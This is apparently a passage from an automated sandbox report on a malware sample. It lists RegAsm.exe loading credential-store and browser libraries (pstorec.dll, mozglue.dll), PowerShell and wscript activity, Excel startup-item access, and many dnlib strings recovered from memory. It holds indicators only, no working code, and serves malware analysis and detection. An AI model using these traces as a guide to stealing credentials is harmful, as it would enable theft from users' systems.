                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
